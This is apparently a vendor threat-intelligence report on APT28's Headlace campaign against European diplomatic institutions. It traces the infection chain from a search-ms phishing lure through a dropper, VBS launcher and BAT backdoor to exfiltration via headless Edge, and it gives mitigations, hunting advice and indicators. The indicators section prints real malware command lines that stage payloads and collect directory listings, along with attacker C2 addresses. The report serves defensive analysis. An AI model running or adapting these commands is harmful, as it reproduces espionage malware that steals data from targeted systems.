Key Findings
APT28, a group linked to Russia's Military Intelligence (GRU), employed the "Headlace" backdoor as part of their attack, demonstrating their advanced capabilities in developing and deploying sophisticated malware designed to infiltrate and control targeted systems.
The attackers utilized legitimate Windows services as LOLBAS (Living Off the Land Binaries and Scripts) to conduct malicious activities while avoiding detection. This approach highlights the group's ability to blend in with legitimate operations and minimize forensic evidence.
The group weaponized legitimate web services for malicious purposes, showcasing their ability to exploit trusted platforms to carry out their attacks and evade network security measures.
APT28 used event tickets as a lure to deceive targets, highlighting their use of social engineering techniques to manipulate victims into executing the malicious payload.
The attack targeted multiple European nations, with possible focus on critical diplomatic institutions within the Vatican, the United Kingdom, Romania, and the European Union. This indicates a strategic interest in compromising high-value governmental and diplomatic entities.
The campaign underscores the persistent threat posed by nation-state-sponsored actors like APT28, who continue to evolve their tactics, techniques, and procedures (TTPs) to compromise critical infrastructure and entities on a global scale.
Executive Summary
This report uncovers a sophisticated cyberattack attributed to APT28, an advanced persistent threat group associated with Russia's Military Intelligence (GRU). APT28 employed a range of advanced and stealthy tactics, including the use of the "Headlace" backdoor, to infiltrate and compromise targets across Europe. The group demonstrated their technical prowess by utilizing legitimate web services for malicious purposes and launching legitimate Windows services as LOLBAS (Living Off the Land Binaries and Scripts), which enabled them to evade detection and leave minimal traces. And used tickets to events as bait to lure victims into their trap.
The scope of the attack was extensive, with potential targets including diplomatic institutions within the Vatican, the United Kingdom, Romania, and the European Union. This campaign highlights the evolving nature of cyber threats and underscores the relentless efforts of nation-state-sponsored actors like APT28 to infiltrate and compromise critical entities.
Headlace Campaign
APT28 continues to deploy sophisticated cyberattacks to compromise high-value targets. One of their key tools is the HeadLace malware. First identified by CERT-UA, this custom malware is part of a complex execution chain designed to evade detection while executing malicious commands on the target system.
In their recent campaign, discovered in February this year, APT28 leveraged the HeadLace malware to infiltrate a list of victims. In a complex chain of execution the payload in a form of Windows BAT script, known as HeadLace, initiates a sophisticated attack sequence. It is capable of downloading and executing additional shell commands with leaving no traces.
The attackers initiated their campaign by distributing phishing emails with malicious URLs. These URLs lead to legitimate service webhook.site, where threat actors host their malicious scripts (hxxps://webhook[.]site/92a1c89c-c371-4b93-a91c-cb0d61b3432d).
The malicious script is an initial step in a more complex attack. It uses search-ms protocol designed to trick the user into thinking they are interacting with legitimate Windows functionality, while actually connecting to a remote server controlled by the attacker.
Figure.1 webhook[.]site script.
First of all, the script manipulates the browser's history using the pushState method. It changes the URL in the browser's address bar to https://webhook.site. However, it does not redirect the user to this site, it just alters the address bar URL.
Then the script redirects the user’s browser by using the search-ms protocol. The search-ms protocol is a Windows feature designed to facilitate and enhance local search operations on a user's device. By leveraging this protocol, the attacker can craft a specially formatted URL that, when executed, initiates a customized search on the user's system. This type of URL can be manipulated to display results that appear legitimate or trustworthy, thus deceiving the user into interacting with malicious files or triggering specific actions.
Figure.2 Prompt to execute search-ms protocol.
Figure.3 search-ms protocol performing local search.
The displayname parameter is used to set a custom display name for the search results in Windows Search. In the provided script, it is used to make the search results appear related to "diplomat.va" which could deceive users into trusting the results and potentially falling victim to malicious actions.
Attackers trick the user into opening or interacting with a search result that appears legitimate but is actually malicious. By using a remote address (hxxp://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/Program%20Files%20(x86)/Microsoft/Edge/Application), the attacker tries to initiate a connection to a malicious server, which then delivers further payloads.
The further payload is the Headlace dropper. It is downloaded in a form of .cmd file from (hxxp://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/bf58e609-e1ff-4d51-8e8c-b2182692bd37.cmd) and saved as 235148996.cmd.
Headlace description
Headlace dropper primary function is to write and execute a series of files that carry out malicious operations on the target system. It is designed to be stealthy, with multiple self-deleting mechanisms to remove traces of its presence.
Figure.4 Headlace dropper (.cmd) script.
The script creates and writes data to the next files in %programdata% directory:
bf58e609-e1ff-4d51-8e8c-b2182692bd37.vbs (Headlace launcher),
bf58e609-e1ff-4d51-8e8c-b2182692bd37.bat (Headlace backdoor),
pvgzsqmsdt.tab,
vtcdlhjnfe.tsv.
Then it executes the created VBScript (bf58e609-e1ff-4d51-8e8c-b2182692bd37.vbs). And opens a legitimate-looking website with tickets to an event dedicated to the second anniversary of the war (https://www.eventbrite.co[.]uk/e/two-years-of-war-in-ukraine-tickets-795333964297) in Microsoft Edge. The event web page serves as a decoy to give a false sense of legitimacy and mislead the victim. Finally, the original batch file deletes itself to eliminate any evidence of its execution, making the operation more covert.
Figure.5 Event dedicated to the second anniversary of the war.
The VBScript (bf58e609-e1ff-4d51-8e8c-b2182692bd37.vbs) is designed to silently execute a batch file (bf58e609-e1ff-4d51-8e8c-b2182692bd37.bat) stored in the %programdata% directory and then delete itself from the system to remove traces of its execution.
Figure.6 Headlace launcher (.vbs) script.
The batch file is the Headlace backdoor, which sets up a continuous loop to execute malicious actions. It leverages Microsoft Edge in headless mode to fetch and execute additional payloads from a remote server, moves and renames files for further execution, and cleans up itself to avoid detection.
It starts a new instance of Microsoft Edge in headless mode (no user interface) and loads a base64-encoded HTML file directly into it. The base64 string contains the encoded HTML content that includes a script to fetch additional malicious code from a remote server (hxxp://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/bf58e609-e1ff-4d51-8e8c-b2182692bd37.sxc). Running Edge in headless mode allows the script to execute without the user noticing. After that it moves any .sxc files in the Downloads directory to %programdata% and renames them with a .cmd extension (mmkyigmfrf.cmd). It then executes the moved and renamed .cmd script, which contains additional malicious instructions or payloads that will further compromise the system.
The continuous loop suggests that the script is designed to maintain persistence, repeatedly attempting to download and execute malicious code while removing any traceable artifacts.
Figure.7 Headlace backdoor (.bat) script.
The first instance of bf58e609-e1ff-4d51-8e8c-b2182692bd37.sxc that we have intercepted, gathers information from the user's system, particularly the contents of specific directories and then uses a headless Edge to send the collected data to a remote server.
It lists the contents of the user's parent directory (%userprofile%\..), Desktop, and Downloads directory, then saves the output to a file named gqifynjifo.diff in the %programdata% directory. This effectively gathers information about files and directories in these locations.
It then combines three files: the gqifynjifo.diff file and previously dropped pvgzsqmsdt.tab and vtcdlhjnfe.tsv files in the %programdata% directory. Saves the combined content of these files into an HTML file named wzmqunhrht.html. The pvgzsqmsdt.tab and vtcdlhjnfe.tsv files contain portions of an HTML script that is completed by appending the gqifynjifo.diff file, which holds the directory listing. The html file contains extracted data and remote server address (hxxp://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/bf58e609-e1ff-4d51-8e8c-b2182692bd37.log), where this data will be sent.
After that, it launches a new, headless instance of Microsoft Edge to load and execute the wzmqunhrht.html file, which sends the previously collected data to a remote server. After the data is sent, the script cleans up all the temporary files and artifacts to avoid detection.
Figure.8 Follow-on payload (.sxc) script.
Figure.9 Execution flow of Headlace attack.
Victimology
By tracking and analyzing malicious HTML attachments associated with this campaign, we have uncovered insights into the targeted entities. By examining the displayname parameter within search-ms protocol commands—used to set custom display names in Windows Search—we identified domain names specifically crafted to deceive users into trusting the search results, thereby increasing the likelihood of falling prey to malicious activities. The following domain names were extracted from the analyzed samples:
Domain | Organization |
eeas.europa.eu | The Diplomatic Service of the European Union |
fco.gov.uk | Foreign & Commonwealth Office of the United Kingdom |
mae.ro | Ministry of Foreign Affairs of Romania |
diplomat.va | The Diplomatic Service of the Holy See |
These domains reveal a clear focus on high-value diplomatic institutions within Europe, which perfectly aligns with APT28's established pattern of targeting governmental and diplomatic entities. The selection of these specific targets is consistent with the scope of interests pursued by Russian military intelligence, reaffirming the sophisticated nature of this campaign and the threat it poses to European diplomatic stability.
Figure.10 Map of targeted countries.
Mitigations
Given the sophisticated nature of the Headlace campaign, a multi-layered approach is crucial to mitigate the impact and detect ongoing or previous compromises. Below are the recommended mitigations and threat hunting strategies:
Mitigation Strategies
Enforce URL filtering at the email gateway to block access to known malicious domains, such as those involving phishing attempts or C2 infrastructure. This should include URLs that may appear in malicious email attachments or embedded within HTML files.
Restrict or monitor the execution of scripts (e.g., BAT, VBS, and PowerShell) from temporary directories like %programdata%. Use application whitelisting to block unauthorized scripts and executables.
Disable or monitor the usage of headless browsing modes (--headless) in browsers like Microsoft Edge, as these are often used for malicious activities without user interaction.
Implement and regularly update IDS/IPS signatures to detect network traffic patterns associated with the Headlace campaign, such as communications with known C2 servers (e.g., 163.172.67[.]233).
Ensure proper network segmentation to minimize the lateral movement of attackers within the environment, limiting potential damage from any compromised endpoints.
Threat Hunting Recommendations
Conduct a thorough search of your organization's email archives for any references to webhook.site in both the body of emails and within attachments.
Search for connections or references to the URL hxxps://www.eventbrite.co[.]uk/e/two-years-of-war-in-ukraine-tickets-795333964297. This legitimate URL is utilized to lure victims.
Monitor and analyze historical and real-time network traffic for any connections to the C2 server 163.172.67[.]233. This IP address is directly associated with the Headlace command-and-control infrastructure.
Search endpoint logs, command history, and process execution data for instances of the msedge browser running in headless mode, indicated by the command
“msedge --headless=new”. This is a key indicator of the Headlace malware's activity, as it utilizes this feature to execute scripts silently.
Search for execution of batch files (.bat), Visual Basic scripts (.vbs), and command scripts (.cmd) in directories such as %programdata%.
Track and log file deletion events, especially those involving temporary files used by malware to execute commands or exfiltrate data. This includes files with extensions .tab, .tsv, .diff.
Outlook
The campaign orchestrated by APT28, as revealed in this report, underscores the persistent and evolving nature of nation-state-sponsored cyber threats. APT28’s use of advanced tactics, such as the "Headlace" backdoor and LOLBAS techniques, demonstrates a significant escalation in their capabilities and their commitment to conducting sophisticated, high-impact operations with a focus on critical targets across Europe.
Moving forward, we anticipate that APT28 and similar advanced threat groups will continue to refine their methods, leveraging both legitimate and custom-built tools to evade detection and increase the stealth of their operations. Their use of LOLBAS and exploitation of legitimate web services for malicious purposes is likely to become more common, presenting ongoing challenges for traditional security defenses.
Organizations, particularly those in sectors of strategic interest such as government, diplomatic missions, and international institutions, must remain vigilant and proactive in their cybersecurity posture. The trend toward LOLBAS malware and the use of legitimate infrastructure for malicious activities necessitates the adoption of more sophisticated threat detection and response mechanisms.
Moreover, as geopolitical tensions persist, the frequency and intensity of such nation-state-sponsored campaigns are expected to increase. Therefore, it is critical for organizations to continuously adapt their security strategies, focusing on enhancing their resilience against highly targeted cyber operations.
Indicators of Compromise
Network:
IP: 163.172.67[.]233
URL: https://webhook[.]site/92a1c89c-c371-4b93-a91c-cb0d61b3432d
(webhook[.]site is the legitimate service)
URL: http://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37
URL: http://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/Program%20Files%20(x86)/Microsoft/Edge/Application
URL: http://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/bf58e609-e1ff-4d51-8e8c-b2182692bd37.cmd
URL: http://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/bf58e609-e1ff-4d51-8e8c-b2182692bd37.log
URL: http://163.172.67[.]233:5000/bf58e609-e1ff-4d51-8e8c-b2182692bd37/bf58e609-e1ff-4d51-8e8c-b2182692bd37.sxc
URL: https://www.eventbrite.co[.]uk/e/two-years-of-war-in-ukraine-tickets-795333964297 (legitimate website, which is used as lure)
Host:
Name: 235148996.cmd (Headlace dropper)
MD5: E0791B209BC10A3137F98822C3179214
SHA-1: 1641E9BBA12E351BB35764AFE90A3C7F833C9B14
SHA-256: 08E29315129CAE53261627C414AEB91409237CC36C00DBB2E42BE6DB76D02C97
Name: bf58e609-e1ff-4d51-8e8c-b2182692bd37.vbs (Headlace launcher)
MD5: 703AC419FFC98974D35597716EA37DE9
SHA-1: 86C2428D76C0785BD1117A4BF4CB1F4A4AFAC96A
SHA-256: D5B66A8EA8D76BC4276CCC1395E14A7572F465EABFE3C1F326B608B809871B45
Name: bf58e609-e1ff-4d51-8e8c-b2182692bd37.bat (Headlace backdoor)
MD5: 3B45F55D3415865B0E4C7E126144A8E3
SHA-1: 4370EF2B100F3D74FE12734638F182FA4C4F1F8B
SHA-256: 8DA0019F8524E91057956806BB2412D8673F25E282FAC7F8B4DC2F6631CAA716
Name: pvgzsqmsdt.tab
MD5: DAD75FDEEA57B6D940D095B97222B43E
SHA1: E663DB0E919A96942D9C077E565326B4770FF84E
SHA256: 90DDB959B8468502E76DEDFBB4F8771474F7719081EAF1657CAECD971991B25F
Name: vtcdlhjnfe.tsv
MD5: E37265FDFD13FD94F69088F6056D4159
SHA1: C2A78A88DFB53DF44A530035193315A1251514D4
SHA256: 9E1DAC07C2DBEB4817259E5656DCDFB96E3D9E6C59D6E0A3E6D1818E810F6980
Name: bf58e609-e1ff-4d51-8e8c-b2182692bd37.sxc
MD5: CF3AEE363E0574338F969F8A8CF0A02C
SHA1: 14D27B7E6E87CB25781C69EE766E1B66A012BCBD
SHA256: 428E5310A78F42E798C3B67F71F4B87C11A822B1AE56A7F4997B0796024BC344
Other discovered samples:
https://webhook.site/f03eb06b-5aad-4e29-bf5c-97f56f9d833f
MD5
54fd51c3bb6f5c65e27f83755a6f2ae4
SHA-1
123b31844fdd42d289dead3d890aa39f7f386404
SHA-256
aef94d2451e1eb943d2b1ee5ed48d923ffff4baeb0d26ebe4450d6e151bf28c8
https://webhook.site/d48744f9-e00f-45e9-9304-c9227be811e1
MD5
cf2c8ed700c9f25e977d0dea7e84719a
SHA-1
b7ef03e718caf274a18735bb7cf021dce4215f0a
SHA-256
7bed81cbbc5d368beb4531a373bad5a38aef7947f565048ad4ba597a821897c6Ω
https://webhook.site/7e385057-012f-4436-816a-732d621fad52
MD5
232bcf77eaddea1243a976366d259fe8
SHA-1
1af358e6a1d3663990b9092b7d3e9ea447f8d39b
SHA-256
ca5dd056e948b1d25bda3a96a0bc6001e20ef20c9516c86718e41817943400fa
Commands:
start "" msedge --headless=new --disable-gpu
move /y "%userprofile%\Downloads\*.sxc" "%programdata%\mmkyigmfrf.cmd"
(dir "%userprofile%\.." & dir "%userprofile%\Desktop" & dir "%userprofile%\Downloads")>"%programdata%\gqifynjifo.diff"
Comentarios